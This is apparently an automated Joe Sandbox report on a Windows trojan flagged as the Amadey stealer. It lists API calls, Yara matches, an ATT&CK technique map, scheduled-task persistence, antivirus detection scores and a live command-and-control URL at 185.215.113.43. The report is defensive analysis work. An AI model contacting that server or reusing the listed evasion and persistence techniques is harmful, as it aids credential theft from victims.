Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe

0_2_0040AA09

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe

Code function: 0_2_0040B1A0 GetUserNameA,

0_2_0040B1A0

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe

Code function: 0_2_00442517 _free,_free,_free,GetTimeZoneInformation,_free,

0_2_00442517

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe

Code function: 0_2_00407D30 GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,

0_2_00407D30

Source: Amcache.hve.4.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.4.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\SysWOW64\WerFault.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\SysWOW64\WerFault.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 21.2.skotes.exe.20a0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.p3aYwXKO5T.exe.2320e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.skotes.exe.2190e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.3.skotes.exe.2220000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.p3aYwXKO5T.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.skotes.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.p3aYwXKO5T.exe.2320e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.skotes.exe.22f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.p3aYwXKO5T.exe.2390000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.skotes.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.skotes.exe.20a0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.skotes.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.3.skotes.exe.22f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.p3aYwXKO5T.exe.2390000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.skotes.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.p3aYwXKO5T.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.3.skotes.exe.2220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.skotes.exe.2190e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000020.00000002.2708366906.0000000002190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1685965706.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2707467490.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1491870136.0000000002390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1705718825.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.1929134301.0000000002220000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1706100646.00000000020A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1686647443.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.1657991300.00000000022F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_0042EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,	0_2_0042EC48
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_0042DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	0_2_0042DF51
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_0234E1B8 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	0_2_0234E1B8
Source: C:\Users\user\Desktop\p3aYwXKO5T.exe	Code function: 0_2_0234EEAF Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,	0_2_0234EEAF
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_0042EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,	21_2_0042EC48
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_0042DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	21_2_0042DF51
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_020CE1B8 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	21_2_020CE1B8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 21_2_020CEEAF Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,	21_2_020CEEAF
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_00402440 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,	32_2_00402440
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_0042EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,	32_2_0042EC48
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_0042DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	32_2_0042DF51
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_021BE1B8 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	32_2_021BE1B8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 32_2_021BEEAF Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,	32_2_021BEEAF

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 Scheduled Task/Job	111 Process Injection	1 Masquerading	OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	31 Virtualization/Sandbox Evasion	LSASS Memory	151 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Native API	Logon Script (Windows)	1 DLL Side-Loading	111 Process Injection	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	22 Software Packing	Cached Domain Credentials	1 Account Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	1 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	3 File and Directory Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	25 System Information Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
p3aYwXKO5T.exe	53%	ReversingLabs	Win32.Trojan.AceCrypter
p3aYwXKO5T.exe	100%	Avira	HEUR/AGEN.1312567
p3aYwXKO5T.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	53%	ReversingLabs	Win32.Trojan.AceCrypter

Source	Detection	Scanner	Label
http://upx.sf.net	0%	URL Reputation	safe
http://185.215.113.43/Zu7JuNko/index.php)X	0%	Avira URL Cloud	safe
http://185.215.113.43/Zu7JuNko/index.phpT	0%	Avira URL Cloud	safe
http://185.215.113.43/Zu7JuNko/index.php8X	0%	Avira URL Cloud	safe
http://185.215.113.43/Zu7JuNko/index.phps	0%	Avira URL Cloud	safe
http://185.215.113.43/Zu7JuNko/index.php	100%	Avira URL Cloud	phishing
http://185.215.113.43/Zu7JuNko/index.phpz	0%	Avira URL Cloud	safe
http://185.215.113.43/Zu7JuNko/index.phpC	0%	Avira URL Cloud	safe
http://185.215.113.43/Zu7JuNko/index.php38c2817dba29a4b5b25dcf02d1	0%	Avira URL Cloud	safe
http://185.215.113.43/Zu7JuNko/index.php(Y	0%	Avira URL Cloud	safe
http://185.215.113.43/Zu7JuNko/index.phpi	0%	Avira URL Cloud	safe
http://185.215.113.43/Zu7JuNko/index.phpncoded	0%	Avira URL Cloud	safe
http://185.215.113.43/Zu7JuNko/index.php(	0%	Avira URL Cloud	safe
http://185.215.113.43/Zu7JuNko/index.phph	0%	Avira URL Cloud	safe
http://185.215.113.43/Zu7JuNko/index.phpL	0%	Avira URL Cloud	safe
http://185.215.113.43/Zu7JuNko/index.phpmX	0%	Avira URL Cloud	safe
http://185.215.113.43/Zu7JuNko/index.php0	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.43/Zu7JuNko/index.php	true	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.43/Zu7JuNko/index.php)X	skotes.exe, 00000020.00000002.2708227505.0000000000830000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.43/Zu7JuNko/index.phps	skotes.exe, 00000020.00000002.2708227505.0000000000811000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.43/Zu7JuNko/index.phpT	skotes.exe, 00000020.00000002.2708227505.0000000000811000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.43/Zu7JuNko/index.phpz	skotes.exe, 00000020.00000002.2708227505.0000000000811000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.43/Zu7JuNko/index.php(Y	skotes.exe, 00000020.00000002.2708227505.0000000000830000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.43/Zu7JuNko/index.php38c2817dba29a4b5b25dcf02d1	skotes.exe, 00000020.00000002.2708227505.0000000000811000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.43/Zu7JuNko/index.php8X	skotes.exe, 00000020.00000002.2708227505.0000000000830000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.43/Zu7JuNko/index.phpC	skotes.exe, 00000020.00000002.2708227505.00000000007D9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	Amcache.hve.4.dr	false	URL Reputation: safe	unknown
http://185.215.113.43/Zu7JuNko/index.phpi	skotes.exe, 00000020.00000002.2708227505.0000000000811000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.43/Zu7JuNko/index.phpncoded	skotes.exe, 00000020.00000002.2708227505.0000000000811000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.43/Zu7JuNko/index.php(	skotes.exe, 00000020.00000002.2708227505.0000000000811000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.43/Zu7JuNko/index.phph	skotes.exe, 00000020.00000002.2708227505.0000000000811000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.43/Zu7JuNko/index.phpL	skotes.exe, 00000020.00000002.2708227505.0000000000811000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.43/Zu7JuNko/index.phpmX	skotes.exe, 00000020.00000002.2708227505.0000000000830000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.43/Zu7JuNko/index.php0	skotes.exe, 00000020.00000002.2708227505.0000000000811000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1517823
Start date and time:	2024-09-25 07:57:14 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	41
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	p3aYwXKO5T.exe renamed because original name is a hash value
Original Sample Name:	0ae8b048945c6ced85df3fb5afa2bc0b.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@22/64@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 32 Number of non-executed functions: 365
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.182.143.212
Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: p3aYwXKO5T.exe

Simulations

Behavior and APIs

Time	Type	Description
01:58:39	API Interceptor	2x Sleep call for process: WerFault.exe modified
01:59:04	API Interceptor	1543x Sleep call for process: skotes.exe modified
07:58:21	Task Scheduler	Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.43	file.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, Stealc, zgRAT	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey, Stealc	Browse	185.215.113.43/Zu7JuNko/index.php
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.43/Zu7JuNko/index.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	A1E1u0Rnel.exe	Get hash	malicious	Amadey	Browse	185.215.113.43
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.103
	file.exe	Get hash	malicious	Amadey, Go Injector, XWorm	Browse	185.215.113.16
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.103
	isiihLLJJr.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RAT	Browse	185.215.113.17
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_p3aYwXKO5T.exe_739d586cc05ff593cef168b7ca7bd46426c9c3_92367cbf_474a8dae-3ccd-43ed-ac57-4df3917c0b2b\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.099310595520642
Encrypted:	false
SSDEEP:	192:y66b3IXwsA0x5Dnj/1nZrSQmRKzuiFBZ24IO8+:pHXwsbx5DnjYKzuiFBY4IO8+
MD5:	FE425F5CE71E25D22EF0866F2AA2A58D
SHA1:	FC615FE20BAF6D94A7CE47B6790F39D82595904E
SHA-256:	ABDE7AF1E1C0EEE076252780DACAE72CD01B50B333B290ED3A46B69947846B2A
SHA-512:	B003E3D6B0B7BE45A2D3F09E9975C30F147B893DB4E5D47940FC37AD2DF47E149E5FA8227A20B57F06815EE4E47BF1DFB8F1D16EB919EA857D47541E869D74C8
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.1.7.5.1.1.1.3.4.6.8.7.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.7.1.7.5.1.1.8.0.6.5.6.0.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.7.4.a.8.d.a.e.-.3.c.c.d.-.4.3.e.d.-.a.c.5.7.-.4.d.f.3.9.1.7.c.0.b.2.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.2.0.c.1.b.a.-.1.f.e.6.-.4.4.7.5.-.b.c.8.d.-.4.a.9.4.2.6.7.8.7.8.8.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.p.3.a.Y.w.X.K.O.5.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.b.0.-.0.0.0.1.-.0.0.1.4.-.c.c.6.4.-.0.9.e.a.0.f.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.b.4.c.1.c.c.0.8.7.0.d.2.4.6.6.e.7.5.7.a.b.8.b.9.9.e.3.f.6.1.1.0.0.0.0.f.f.f.f.!.0.0.0.0.a.f.1.8.6.2.0.1.3.b.a.6.2.7.e.9.4.f.b.f.a.1.0.d.e.4.f.c.5.1.5.f.b.4.2.d.9.1.c.0.!.p.3.a.Y.w.X.K.O.5.T...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_p3aYwXKO5T.exe_f8ef4cd7629ba1b8065383a211c32b655eb30e9_92367cbf_0ee9c536-c995-43ff-92ed-ceaea6261b42\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8318230358061798
Encrypted:	false
SSDEEP:	96:JmNnU+3IclskhqwoA7Jf9QXIDcQnc6rCcEhcw3rL+HbHg/8BRTf3o8Fa9OyRgEVI:cnb3Iclwt056rAj/azuiFBZ24IO8+
MD5:	63D51AF2A8552155A2B45B1B71E8EA22
SHA1:	C6A13B065E47C9FF14F15DD5DF25D9D97FCF670B
SHA-256:	FA85CF8003523B173664FE09B0A0304EA70D5FC12A1A46CC4C7C7B5220F01287
SHA-512:	397A4639BE3E711EDD4A4F846244F6D218651ABE8A3B4FA808D4A53A5465AF38F04F9F50344E9FEA1C9AA7D22243DDDC551B39AD63B88D2C258E21CE1994E018
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.1.7.5.0.1.9.4.0.9.6.3.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.e.e.9.c.5.3.6.-.c.9.9.5.-.4.3.f.f.-.9.2.e.d.-.c.e.a.e.a.6.2.6.1.b.4.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.d.4.3.7.6.f.6.-.6.1.9.a.-.4.d.1.3.-.8.8.6.7.-.e.d.d.1.9.d.9.f.5.4.9.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.p.3.a.Y.w.X.K.O.5.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.b.0.-.0.0.0.1.-.0.0.1.4.-.c.c.6.4.-.0.9.e.a.0.f.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.b.4.c.1.c.c.0.8.7.0.d.2.4.6.6.e.7.5.7.a.b.8.b.9.9.e.3.f.6.1.1.0.0.0.0.f.f.f.f.!.0.0.0.0.a.f.1.8.6.2.0.1.3.b.a.6.2.7.e.9.4.f.b.f.a.1.0.d.e.4.f.c.5.1.5.f.b.4.2.d.9.1.c.0.!.p.3.a.Y.w.X.K.O.5.T...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.2.:.1.7.:.4.0.:.4.4.!.0.!.p.3.a.Y.w.X.K.O.5.T...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_p3aYwXKO5T.exe_f8ef4cd7629ba1b8065383a211c32b655eb30e9_92367cbf_25c7a264-285f-476a-bf9c-5bd695861cda\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.8907397115859715
Encrypted:	false
SSDEEP:	96:0BU+3IJskhqwoA7Jf9QXIDcQnc6rCcEhcw3rL+HbHg/8BRTf3o8Fa9OyRgEVsPiz:Qb3IJwt056rAj/1nZrHzuiFBZ24IO8+
MD5:	A03A5583233F1E032F44259B68EDE1A6
SHA1:	77F448327FFE0E6219B8541FEB96EF87DB2B5BDE
SHA-256:	E97628AEB1A77067BE73330C62865DD79C7879E8733F1BA2B1FADC2CD9AFFE1E
SHA-512:	7422B85BEE09E37EDB1B0E3D841CA96562EA1585533793DDC3C8A101BFFAE5950DBEB3A887BA3D8F2C35781ABBB285ADE033CE96EB19764CE592257A65DA8B1B
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.7.1.7.5.0.3.5.3.7.8.6.6.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.5.c.7.a.2.6.4.-.2.8.5.f.-.4.7.6.a.-.b.f.9.c.-.5.b.d.6.9.5.8.6.1.c.d.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.6.2.0.5.6.9.7.-.7.7.4.e.-.4.d.f.f.-.b.2.5.1.-.d.f.4.c.d.b.d.5.b.3.a.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.p.3.a.Y.w.X.K.O.5.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.b.0.-.0.0.0.1.-.0.0.1.4.-.c.c.6.4.-.0.9.e.a.0.f.0.f.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.b.4.c.1.c.c.0.8.7.0.d.2.4.6.6.e.7.5.7.a.b.8.b.9.9.e.3.f.6.1.1.0.0.0.0.f.f.f.f.!.0.0.0.0.a.f.1.8.6.2.0.1.3.b.a.6.2.7.e.9.4.f.b.f.a.1.0.d.e.4.f.c.5.1.5.f.b.4.2.d.9.1.c.0.!.p.3.a.Y.w.X.K.O.5.T...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.9././.2.2.:.1.7.:.4.0.:.4.4.!.0.!.p.3.a.Y.w.X.K.O.5.T...e.x.e.....B.o.o.t.I.d.=.4.

